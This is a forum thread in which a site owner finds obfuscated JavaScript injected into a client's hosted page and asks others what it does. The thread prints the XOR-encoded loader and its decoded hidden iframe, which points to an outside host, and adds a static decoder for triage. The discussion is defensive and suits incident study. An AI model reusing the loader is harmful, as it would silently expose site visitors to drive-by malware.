Hacked websites
#1
Scooby Regular
Thread Starter
Join Date: Apr 1999
Location: Bore Knee Muff
Posts: 3,666
Hacked websites
Anyone any experience of this?
I have a client's site hosted at Fasthosts.
Their home page suddenly took longer to load and I noticed some javascript...
<script language="JavaScript">
e = '0x00' + '46';
str1 = "%FD%A5%AE%B3%D9%B4%B5%BE%AD%A2%FA%E7%B3%AE%B4%AE% A7%AE%AD%AE%B5%BE%FF%A1%AE%A5%A5%A2%AB%E7%FB%FD%AE %A3%B7%A6%AA%A2%D9%B4%B7%A4%FA%E7%A1%B5%B5%A9%FF%E 8%E8%A1%A1%A1%A0%F6%EB%A4%A8%AA%E8%AA%A2%AB%B5%E8% E7%D9%B0%AE%A5%B5%A1%FA%F6%D9%A1%A2%AE%A0%A1%B5%FA %F6%FB%FD%E8%AE%A3%B7%A6%AA%A2%FB%FD%E8%A5%AE%B3%F B";
str=tmp='';
for(i=0;i<str1.length;i+=3)
{
tmp = unescape(str1.slice(i,i+3));
str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);
}
Then it writes that string out.....
</script>
The result of that is the following decrypted:
<div style="visibility:hidden">
<iframe src="http://hhhg1.com/ment/" width=1 height=1>
</iframe>
</div>
Anyone else seen this?
Know what it does?
Rich
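Added example (not part of the original post): a static decoder for the string in the script above, so the payload can be read without running the injected code. The function names are made up for this example; the key 0x46 and offset 127 come from the script's own loop, and the sample is str1 as pasted, stray wrap spaces included.

```javascript
// Added example, not from the thread: static decoder for the injected script's string.
// Nothing is evaluated or written into a page; the output is plain text for triage.

// str1 as pasted in the post, including the spaces added by forum line wrapping.
const SAMPLE = "%FD%A5%AE%B3%D9%B4%B5%BE%AD%A2%FA%E7%B3%AE%B4%AE% A7%AE%AD%AE%B5%BE%FF%A1%AE%A5%A5%A2%AB%E7%FB%FD%AE %A3%B7%A6%AA%A2%D9%B4%B7%A4%FA%E7%A1%B5%B5%A9%FF%E 8%E8%A1%A1%A1%A0%F6%EB%A4%A8%AA%E8%AA%A2%AB%B5%E8% E7%D9%B0%AE%A5%B5%A1%FA%F6%D9%A1%A2%AE%A0%A1%B5%FA %F6%FB%FD%E8%AE%A3%B7%A6%AA%A2%FB%FD%E8%A5%AE%B3%F B";

// Mirrors the script's loop: each %XX byte is XORed with the key, then 127 is subtracted.
function decodeInjected(encoded, key = 0x46, offset = 127) {
  const compact = encoded.replace(/\s+/g, ""); // undo the wrapping damage
  if (!/^(%[0-9A-Fa-f]{2})*$/.test(compact)) {
    throw new Error("input is not a pure %XX sequence");
  }
  let out = "";
  for (let i = 0; i < compact.length; i += 3) {
    const byte = parseInt(compact.slice(i + 1, i + 3), 16);
    const code = (byte ^ key) - offset;
    if (code < 0x09 || code > 0x7e) {
      throw new Error(`byte ${i / 3} decodes outside tab..tilde; wrong key or offset?`);
    }
    out += String.fromCharCode(code);
  }
  return out;
}

// Coarse indicator extraction: every iframe target, flagged if the markup hides it
// (hidden/none style anywhere in the snippet, or a 0/1 pixel width and height).
function iframeIndicators(html) {
  const hiddenWrapper = /visibility\s*:\s*hidden|display\s*:\s*none/i.test(html);
  const found = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = m[1];
    const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(attrs);
    const tiny = /\bwidth\s*=\s*["']?[01]\b/i.test(attrs) &&
                 /\bheight\s*=\s*["']?[01]\b/i.test(attrs);
    found.push({ src: src ? src[1] : null, hidden: hiddenWrapper || tiny });
  }
  return found;
}

const decoded = decodeInjected(SAMPLE);
console.log(decoded);
console.log(iframeIndicators(decoded));
```

The extracted src value is the string to search for across the rest of the site's files and in the web server logs.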
#2
Scooby Regular
Join Date: Sep 1999
Location: Swindon, Wiltshire
Xbox Gamertag: Gutgouger
Posts: 6,956
Well, it creates a hidden iframe, the src of which points to a web address that (at the moment) doesn't seem to exist. So it won't do anything at the moment.
My guess is that it was (or will be) trying to install some dodgy tracking cookies or something of the ilk...
#3
my g/f's site got hacked recently. all the links in the site were replaced with links to a viagra type site and there was similar javascript in the header that you have.
fortunately I had a backup, so wiped the site, changed the password and re uploaded.
had to kill all my local cookies etc too
bastids
#7
Scooby Regular
Thread Starter
Join Date: Apr 1999
Location: Bore Knee Muff
Posts: 3,666
Yes and MySql - Any top tips on what to look for cottonfoo?
Contact form stuffing?
In theory only me and their IT support company have FTP access to the site.
#8
Scooby Regular
Join Date: Jan 2001
Location: still behind twin turbos
Posts: 469
PHP has some fundamental issues as it is, let alone any flaws present in any software written in it:
PHP security under scrutiny | The Register
The PHP problems have been going on for a while.
"The PHP Group will jump into your boat as soon you try to blame PHP's security problems on the user, but the moment you criticise the security of PHP itself you become persona non grata."
From Retired from security@php.net - PHP Security Blog
#9
Scooby Regular
iTrader: (6)
Join Date: Apr 2005
Location: Stroke it baby!
Posts: 33,828
my g/f's site got hacked recently. all the links in the site were replaced with links to a viagra type site and there was similar javascript in the header that you have.
fortunately I had a backup, so wiped the site, changed the password and re uploaded.
had to kill all my local cookies etc too
bastids
#10
Scooby Regular
Join Date: Jan 2001
Location: still behind twin turbos
Posts: 469
#11
Scooby Regular
Have a look at the files in the directory and make sure there is no file called up.php, which is a common hacker tool they use. Once on your site, they can do as they please to your website. Only have one PHP site and it's been hacked a number of times, every time through the PHP.
#12
Scooby Regular
Thread Starter
Join Date: Apr 1999
Location: Bore Knee Muff
Posts: 3,666
How do they write stuff into your files?
Is it because the IUSR (Yes windows IIS) has write permissions or something...
Sadly I don't have control over the server itself.
I managed to upload some code to allow me complete access to another ISP's shared site server's files and folders. Obviously I needed access to get the file up there and I would imagine I could do the same thing and insert my javascript to every file on the server should I desire...
I've not really found any 'this is how they did it' or 'this is how I stopped it' type pages though.
Any other links cottonfoo?
#13
Scooby Regular
Join Date: Jan 2001
Location: still behind twin turbos
Posts: 469
Loads, but this is a family forum. There isn't really much you can do unless you have control of the server. Have you told the ISP their services have been compromised?
I'd search on "<the PHP application you use> exploits security" or something to see possible entry points, make sure you know exactly what versions of what you're using.